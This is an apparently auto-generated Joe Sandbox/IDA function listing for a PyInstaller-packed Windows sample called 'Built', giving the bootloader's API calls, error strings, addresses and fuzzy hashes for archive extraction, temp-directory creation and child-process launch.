Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
Instruction ID: 6235351fb741558fdafd24541fb94a9e81359862d284f445068b45daca4f5b01
Opcode Fuzzy Hash: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
Instruction Fuzzy Hash: 2D02CF21E3D683C4FA65BB1AA820279A780AF59B90FC44635DD7D46BD3FE7DA4018334

Function 00007FF76D5C18F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF76D5C76A0: _fread_nolock.LIBCMT ref: 00007FF76D5C774A

_fread_nolock.LIBCMT ref: 00007FF76D5C19B4

Part of subcall function 00007FF76D5C2760: MessageBoxW.USER32 ref: 00007FF76D5C283B

Strings

fseek, xrefs: 00007FF76D5C1990
Error on file., xrefs: 00007FF76D5C1B0A
Could not read full TOC!, xrefs: 00007FF76D5C1AD4
fread, xrefs: 00007FF76D5C19C6, 00007FF76D5C1ADB
MEI, xrefs: 00007FF76D5C1931
Could not allocate buffer for TOC!, xrefs: 00007FF76D5C1AA1
Could not allocate memory for archive structure!, xrefs: 00007FF76D5C19EE
calloc, xrefs: 00007FF76D5C19F5
Failed to seek to cookie position!, xrefs: 00007FF76D5C1989
Failed to read cookie!, xrefs: 00007FF76D5C19BF
malloc, xrefs: 00007FF76D5C1AA8

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 677216364-3497178890
Opcode ID: 6fe09687227c44a11a2aea52fbca8833870d003cb7aa0180f1ca23ffa5452ddf
Instruction ID: af7b0739bf16475b14ff838075313ec0266d431c27592a6456d0ae0be2933662
Opcode Fuzzy Hash: 6fe09687227c44a11a2aea52fbca8833870d003cb7aa0180f1ca23ffa5452ddf
Instruction Fuzzy Hash: 86719171A2C686C5EB20BB14D4506B9A3A1EB58788F845039ED8D47F9BFE2CE5448F70

Function 00007FF76D5C15C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fseek, xrefs: 00007FF76D5C1695
fwrite, xrefs: 00007FF76D5C177C
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF76D5C1775
Failed to create symbolic link %s!, xrefs: 00007FF76D5C15E2
fread, xrefs: 00007FF76D5C178C
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF76D5C16EF
fopen, xrefs: 00007FF76D5C161E
Failed to extract %s: failed to open target file!, xrefs: 00007FF76D5C1617
Failed to extract %s: failed to open archive file!, xrefs: 00007FF76D5C165B
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF76D5C1785
malloc, xrefs: 00007FF76D5C16F6
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF76D5C168E

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2030045667-1550345328
Opcode ID: 2c3af65fb8522519536d07b6bbe2d4d966547a78dc6b9025643caf232311552d
Instruction ID: 134f155b7ec8cdd1af335565368b3dc9593892fbddf6f13be953dd8d6c6e7f36
Opcode Fuzzy Hash: 2c3af65fb8522519536d07b6bbe2d4d966547a78dc6b9025643caf232311552d
Instruction Fuzzy Hash: 6C517A61B2C643D2EA10BB25A9505B9A3A0BF48B94FC44139ED1D47F97FE3CE5548B30

Function 00007FF76D5C7FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9

SetConsoleCtrlHandler.KERNEL32(?,00007FF76D5C39C0), ref: 00007FF76D5C800A
GetStartupInfoW.KERNEL32(?,00007FF76D5C39C0), ref: 00007FF76D5C802B

Part of subcall function 00007FF76D5D978C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D97A0

Part of subcall function 00007FF76D5D7A2C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D7A93

GetCommandLineW.KERNEL32(?,00007FF76D5C39C0), ref: 00007FF76D5C80CD
CreateProcessW.KERNELBASE ref: 00007FF76D5C810F
WaitForSingleObject.KERNEL32(?,00007FF76D5C39C0), ref: 00007FF76D5C8123
GetExitCodeProcess.KERNELBASE ref: 00007FF76D5C8133

Strings

CreateProcessW, xrefs: 00007FF76D5C8146
Failed to create child process!, xrefs: 00007FF76D5C813F

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Failed to create child process!
API String ID: 2895956056-699529898
Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction ID: 5c95ef3233acb4006b4c4665c0adfba61d3624a43145cedb2713642687650bb7
Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction Fuzzy Hash: 7B410431A1C781C1DB20BB24F4552AAB3A1FB89364F900335E9AD47BD6EF7CD0458B60

Function 00007FF76D5C11F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF76D5C1256
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF76D5C1295
1.3.1, xrefs: 00007FF76D5C1229
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF76D5C13EE
malloc, xrefs: 00007FF76D5C129C, 00007FF76D5C12CA
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF76D5C12C3

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-2813020118
Opcode ID: a3629aa16b2bf4226d63d046932eab8e2b7a9c7a4f48f2e716c054c0a2a071a0
Instruction ID: 287f446f9f77c864851de44c49c444a1c6a98fe4868331a5d6f310da19a87954
Opcode Fuzzy Hash: a3629aa16b2bf4226d63d046932eab8e2b7a9c7a4f48f2e716c054c0a2a071a0
Instruction Fuzzy Hash: EB51B462A2CA42C1EA60BB16A4507BAA291BF45798F844139DD4D47FD7FE3CE541CB30

Function 00007FF76D5DE020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF76D5DE3BA,?,?,-00000018,00007FF76D5DA063,?,?,?,00007FF76D5D9F5A,?,?,?,00007FF76D5D524E), ref: 00007FF76D5DE19C
GetProcAddress.KERNEL32(?,?,?,00007FF76D5DE3BA,?,?,-00000018,00007FF76D5DA063,?,?,?,00007FF76D5D9F5A,?,?,?,00007FF76D5D524E), ref: 00007FF76D5DE1A8

Strings

ext-ms-, xrefs: 00007FF76D5DE0F9
api-ms-, xrefs: 00007FF76D5DE0E6

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction ID: f2893d0b71bf94a64afa05ebb4aa7950cd02e9e61dca5ef5c7578f6153641722
Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction Fuzzy Hash: DC41C331B2D602C1FA16FB16A8106B5E292BF45BA0F894135DD6D97B86FE3CE405C234

Function 00007FF76D5C7C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF76D5C3834), ref: 00007FF76D5C7CE4
CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF76D5C3834), ref: 00007FF76D5C7D2C

Part of subcall function 00007FF76D5C7E10: GetEnvironmentVariableW.KERNEL32(00007FF76D5C365F), ref: 00007FF76D5C7E47
Part of subcall function 00007FF76D5C7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF76D5C7E69

Part of subcall function 00007FF76D5D7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D7561

Part of subcall function 00007FF76D5C26C0: MessageBoxW.USER32 ref: 00007FF76D5C2736

Strings

TMP, xrefs: 00007FF76D5C7C7C, 00007FF76D5C7D83
LOADER: failed to set the TMP environment variable., xrefs: 00007FF76D5C7CBC
TMP, xrefs: 00007FF76D5C7CA2
_MEI%d, xrefs: 00007FF76D5C7CF2
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF76D5C7D5E

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 740614611-1339014028
Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
Instruction ID: 7c0004b7c7c841ee3bd77a572f202ef4d75feee4cc4491f1e2f6653cabc14b15
Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
Instruction Fuzzy Hash: 7C418011E2D642C1EA20BB6199652F99261AF997C0FC41036ED2D47F97FE3CE5058B70

Function 00007FF76D5DAD6C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5DB199

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f46020de842a52cafdde7105f07d1b6eb91271a1123fdb72a25b984c7f5050ec
Instruction ID: aafb22e96dce284fa08566b45f0ed1a251ad769c013d0808e08d1a3ce162d628
Opcode Fuzzy Hash: f46020de842a52cafdde7105f07d1b6eb91271a1123fdb72a25b984c7f5050ec
Instruction Fuzzy Hash: B5C1E22292C787D1EB61BB5490206BEB761EB94BC0F950131DE6D03B93EE7CE4458338

Function 00007FF76D5C7B50 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF76D5C7B70
OpenProcessToken.ADVAPI32 ref: 00007FF76D5C7B83
GetTokenInformation.KERNELBASE ref: 00007FF76D5C7BA8
GetLastError.KERNEL32 ref: 00007FF76D5C7BB2
GetTokenInformation.KERNELBASE ref: 00007FF76D5C7BF2
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF76D5C7C0E
CloseHandle.KERNEL32 ref: 00007FF76D5C7C26

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
Instruction ID: c6239d03bfcab29e8c8e1406a08318e42d2e3cc7d99674f6556714ee47cc68a3
Opcode Fuzzy Hash: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
Instruction Fuzzy Hash: DC212121E1CB4382EB10BB55A44422AE7A1EB857A5F900639DE7D43ED6EF6CD4458B20

Function 00007FF76D5C33E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF76D5C3534), ref: 00007FF76D5C3411

Part of subcall function 00007FF76D5C29E0: GetLastError.KERNEL32(?,?,?,00007FF76D5C342E,?,00007FF76D5C3534), ref: 00007FF76D5C2A14
Part of subcall function 00007FF76D5C29E0: FormatMessageW.KERNEL32(?,?,?,00007FF76D5C342E), ref: 00007FF76D5C2A7D
Part of subcall function 00007FF76D5C29E0: MessageBoxW.USER32 ref: 00007FF76D5C2ACF

Strings

Failed to resolve full path to executable %ls., xrefs: 00007FF76D5C3461
GetModuleFileNameW, xrefs: 00007FF76D5C3422
Failed to convert executable path to UTF-8., xrefs: 00007FF76D5C34B8
\\?\, xrefs: 00007FF76D5C3482
Failed to obtain executable path., xrefs: 00007FF76D5C341B

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message$ErrorFileFormatLastModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 517058245-2863816727
Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction ID: 3e318591bf323d374e0c0ceccb56d2509de617ca72c216a2ffb406021f04854f
Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction Fuzzy Hash: A3215161B2C646D1FA21BB24E8553B9A250BF58395FC0013ADE6D86DE7FF2CE5048B30

Function 00007FF76D5C8400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF76D5C7B50: GetCurrentProcess.KERNEL32 ref: 00007FF76D5C7B70
Part of subcall function 00007FF76D5C7B50: OpenProcessToken.ADVAPI32 ref: 00007FF76D5C7B83
Part of subcall function 00007FF76D5C7B50: GetTokenInformation.KERNELBASE ref: 00007FF76D5C7BA8
Part of subcall function 00007FF76D5C7B50: GetLastError.KERNEL32 ref: 00007FF76D5C7BB2
Part of subcall function 00007FF76D5C7B50: GetTokenInformation.KERNELBASE ref: 00007FF76D5C7BF2
Part of subcall function 00007FF76D5C7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF76D5C7C0E
Part of subcall function 00007FF76D5C7B50: CloseHandle.KERNEL32 ref: 00007FF76D5C7C26

LocalFree.KERNEL32(?,00007FF76D5C3814), ref: 00007FF76D5C848C
LocalFree.KERNEL32(?,00007FF76D5C3814), ref: 00007FF76D5C8495

Strings

D:(A;;FA;;;%s), xrefs: 00007FF76D5C8477
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF76D5C84A3
S-1-3-4, xrefs: 00007FF76D5C8441
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF76D5C8462

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
Instruction ID: 4e6e39f8fb2ee8cd2591a199544433e29ff7c5248a70f14e8b0feb9204e49fda
Opcode Fuzzy Hash: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
Instruction Fuzzy Hash: A1212C21A2C642C2E650BB10E4552EAA2A5FB88784FC4403AEE4D57B97EE3CD8458B70

Function 00007FF76D5DC270 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76D5DC25B), ref: 00007FF76D5DC38C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76D5DC25B), ref: 00007FF76D5DC417

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
Instruction ID: 458f2ce71b43a27e06bc881334e9649ee0d8683f66b9631d7c4f1d92e81d0303
Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
Instruction Fuzzy Hash: 1591E632F2C652C5F760EF6594602BDABA0BB08B89F944139DE1E56E86EF38D441C734

Function 00007FF76D5D4938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D4965
CreateFileW.KERNELBASE ref: 00007FF76D5D49A4
CloseHandle.KERNEL32 ref: 00007FF76D5D49D9

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction ID: b2ddc5d05920a2b1e720d7c39f6b679bb479ad9be51ccdb2a1caf50ed151d5a5
Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction Fuzzy Hash: 6541A622D2C78283E714AF219520379A251FB98764F509334EEAC03ED6EF7CA1E08724

Function 00007FF76D5CBF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5CC12C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF76D5CC140

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF76D5CBF80
__scrt_release_startup_lock.LIBCMT ref: 00007FF76D5CBFEE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF76D5CC041

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction ID: 1d15394fc232dadb7ac95c06d78cbbb7b2f5d2f9e0a05e88802c2c47313d61a7
Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
